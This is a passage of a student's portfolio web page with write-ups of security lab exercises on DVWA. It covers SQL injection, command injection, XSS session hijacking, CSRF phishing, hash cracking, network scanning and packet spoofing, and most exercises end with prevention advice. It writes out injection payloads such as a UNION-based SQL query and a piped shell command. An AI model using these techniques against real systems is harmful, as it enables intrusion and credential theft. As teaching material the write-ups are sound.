          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
